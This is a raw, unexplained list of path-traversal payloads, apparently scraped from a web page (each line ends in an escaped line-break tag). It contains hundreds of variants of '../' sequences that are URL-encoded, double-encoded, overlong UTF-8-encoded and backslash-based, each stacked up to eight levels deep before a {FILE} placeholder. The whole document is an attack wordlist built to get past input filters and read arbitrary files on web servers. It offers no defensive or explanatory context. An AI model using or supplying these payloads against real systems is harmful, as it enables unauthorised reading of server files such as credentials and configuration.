%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
